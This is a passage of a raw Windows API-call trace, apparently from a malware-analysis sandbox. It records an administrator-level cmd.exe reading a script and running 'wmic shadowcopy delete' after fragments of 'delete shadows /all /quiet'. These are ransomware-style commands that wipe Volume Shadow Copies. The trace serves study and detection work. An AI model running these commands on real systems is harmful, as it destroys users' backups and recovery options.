lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.045] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c40, cchWideChar=1 | out: lpWideCharStr="ddelete shadows /all /quiet\n") returned 1 [0137.045] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.045] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.045] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c42, cchWideChar=1 | out: lpWideCharStr="oelete shadows /all /quiet\n") returned 1 [0137.045] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.045] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.045] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c44, cchWideChar=1 | out: lpWideCharStr="wlete shadows /all /quiet\n") returned 1 [0137.045] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.045] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.045] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c46, cchWideChar=1 | out: lpWideCharStr="cete shadows /all /quiet\n") returned 1 [0137.045] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.045] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.045] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c48, cchWideChar=1 | out: lpWideCharStr="ote shadows /all /quiet\n") returned 1 [0137.045] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.045] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.065] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4a, cchWideChar=1 | out: lpWideCharStr="pe shadows /all /quiet\n") returned 1 [0137.065] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.065] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.065] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4c, cchWideChar=1 | out: lpWideCharStr="y shadows /all /quiet\n") returned 1 [0137.065] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.065] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.065] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4e, cchWideChar=1 | out: lpWideCharStr=" shadows /all /quiet\n") returned 1 [0137.065] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.065] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.065] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c50, cchWideChar=1 | out: lpWideCharStr="dhadows /all /quiet\n") returned 1 [0137.065] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.065] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.065] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c52, cchWideChar=1 | out: lpWideCharStr="eadows /all /quiet\n") returned 1 [0137.065] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.065] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.065] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c54, cchWideChar=1 | out: lpWideCharStr="ldows /all /quiet\n") returned 1 [0137.066] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.066] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.066] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c56, cchWideChar=1 | out: lpWideCharStr="eows /all /quiet\n") returned 1 [0137.066] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.066] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.066] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c58, cchWideChar=1 | out: lpWideCharStr="tws /all /quiet\n") returned 1 [0137.066] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.066] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.066] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5a, cchWideChar=1 | out: lpWideCharStr="es /all /quiet\n") returned 1 [0137.066] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.066] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.066] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0137.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5c, cchWideChar=1 | out: lpWideCharStr="\n /all /quiet\n") returned 1 [0137.066] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.066] GetFileType (hFile=0x248) returned 0x3 [0137.066] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.066] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.066] _get_osfhandle (_FileHandle=1) returned 0x254 [0137.066] GetFileType (hFile=0x254) returned 0x3 [0137.066] _get_osfhandle (_FileHandle=1) returned 0x254 [0137.066] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="wmic shadowcopy delete\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wmic shadowcopy delete\n", lpUsedDefaultChar=0x0) returned 24 [0137.066] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x8dc3d4f798, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f798*=0x17, lpOverlapped=0x0) returned 1 [0137.066] GetProcessHeap () returned 0x27a547e0000 [0137.066] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x4012) returned 0x27a547e8bb0 [0137.066] GetProcessHeap () returned 0x27a547e0000 [0137.067] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e8bb0) returned 1 [0137.067] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0137.067] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0137.067] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0137.067] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0137.067] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0137.067] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0137.067] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0137.067] GetProcessHeap () returned 0x27a547e0000 [0137.067] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xb0) returned 0x27a547e6e30 [0137.067] GetProcessHeap () returned 0x27a547e0000 [0137.067] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x1a) returned 0x27a547e6c60 [0137.068] GetProcessHeap () returned 0x27a547e0000 [0137.068] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x36) returned 0x27a547e6ef0 [0137.068] GetConsoleOutputCP () returned 0x1b5 [0137.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0137.127] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.131] GetConsoleTitleW (in: lpConsoleTitle=0x8dc3d4f5e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0137.131] malloc (_Size=0xffce) returned 0x27a549d0840 [0137.131] ??_V@YAXPEAX@Z () returned 0x27a549d0840 [0137.131] malloc (_Size=0xffce) returned 0x27a549e0820 [0137.131] ??_V@YAXPEAX@Z () returned 0x27a549e0820 [0137.131] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0137.131] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0137.131] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0137.131] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0137.131] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0137.131] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0137.131] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0137.131] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0137.131] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0137.131] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0137.131] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0137.131] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0137.131] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0137.131] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0137.131] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0137.131] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0137.132] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0137.132] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0137.132] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0137.132] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0137.132] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0137.132] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0137.132] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0137.132] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0137.132] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0137.132] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0137.132] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0137.132] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0137.132] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0137.132] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0137.132] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0137.132] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0137.132] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0137.132] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0137.132] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0137.132] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0137.133] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0137.133] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0137.133] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0137.133] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0137.133] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0137.133] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0137.133] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0137.133] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0137.133] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0137.135] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0137.135] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0137.135] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0137.135] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0137.135] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0137.136] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0137.136] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0137.136] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0137.136] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0137.136] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0137.136] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0137.136] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0137.136] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0137.136] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0137.136] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0137.206] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0137.206] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0137.206] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0137.206] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0137.206] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0137.206] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0137.206] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0137.206] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0137.206] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0137.206] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0137.206] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0137.206] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0137.206] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0137.207] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0137.207] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0137.207] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0137.207] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0137.207] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0137.207] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0137.207] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0137.207] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0137.207] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0137.207] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0137.207] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0137.207] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0137.207] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0137.207] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0137.207] ??_V@YAXPEAX@Z () returned 0x1 [0137.207] GetProcessHeap () returned 0x27a547e0000 [0137.207] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xffde) returned 0x27a547e8bb0 [0137.208] GetProcessHeap () returned 0x27a547e0000 [0137.208] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x40) returned 0x27a547f8ba0 [0137.208] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0137.208] malloc (_Size=0xffce) returned 0x27a549e0820 [0137.208] ??_V@YAXPEAX@Z () returned 0x27a549e0820 [0137.208] GetProcessHeap () returned 0x27a547e0000 [0137.208] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x1ffac) returned 0x27a547fc0c0 [0137.210] SetErrorMode (uMode=0x0) returned 0x0 [0137.210] SetErrorMode (uMode=0x1) returned 0x0 [0137.210] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x27a547fc0d0, lpFilePart=0x8dc3d4ee60 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x8dc3d4ee60*="system32") returned 0x13 [0137.210] SetErrorMode (uMode=0x0) returned 0x1 [0137.210] GetProcessHeap () returned 0x27a547e0000 [0137.210] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547fc0c0, Size=0x42) returned 0x27a547fc0c0 [0137.210] GetProcessHeap () returned 0x27a547e0000 [0137.210] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547fc0c0) returned 0x42 [0137.211] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0137.211] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0137.211] GetProcessHeap () returned 0x27a547e0000 [0137.211] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x1b4) returned 0x27a547f8bf0 [0137.211] GetProcessHeap () returned 0x27a547e0000 [0137.211] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x358) returned 0x27a547f8db0 [0137.211] GetProcessHeap () returned 0x27a547e0000 [0137.211] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f8db0, Size=0x1b6) returned 0x27a547f8db0 [0137.211] GetProcessHeap () returned 0x27a547e0000 [0137.211] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f8db0) returned 0x1b6 [0137.211] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0137.211] GetProcessHeap () returned 0x27a547e0000 [0137.211] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xe8) returned 0x27a547f8f80 [0137.211] GetProcessHeap () returned 0x27a547e0000 [0137.211] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f8f80, Size=0x7e) returned 0x27a547f8f80 [0137.211] GetProcessHeap () returned 0x27a547e0000 [0137.211] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f8f80) returned 0x7e [0137.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0137.211] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0xffffffffffffffff [0137.211] GetLastError () returned 0x2 [0137.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0137.211] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0xffffffffffffffff [0137.214] GetLastError () returned 0x2 [0137.214] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0137.214] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0xffffffffffffffff [0137.214] GetLastError () returned 0x2 [0137.214] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0137.215] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0xffffffffffffffff [0137.215] GetLastError () returned 0x2 [0137.215] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0137.215] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0x27a547f9010 [0137.215] FindClose (in: hFindFile=0x27a547f9010 | out: hFindFile=0x27a547f9010) returned 1 [0137.215] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0xffffffffffffffff [0137.215] GetLastError () returned 0x2 [0137.215] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0x27a547f9010 [0137.216] FindClose (in: hFindFile=0x27a547f9010 | out: hFindFile=0x27a547f9010) returned 1 [0137.216] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0137.216] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0137.216] ??_V@YAXPEAX@Z () returned 0x1 [0137.216] GetConsoleTitleW (in: lpConsoleTitle=0x8dc3d4f150, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0137.225] GetProcessHeap () returned 0x27a547e0000 [0137.225] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x21c) returned 0x27a547f9010 [0137.225] GetConsoleTitleW (in: lpConsoleTitle=0x27a547f9020, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0137.612] GetProcessHeap () returned 0x27a547e0000 [0137.612] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f9010, Size=0xa8) returned 0x27a547f9010 [0137.612] GetProcessHeap () returned 0x27a547e0000 [0137.612] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f9010) returned 0xa8 [0137.612] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - wmic shadowcopy delete") returned 1 [0137.681] 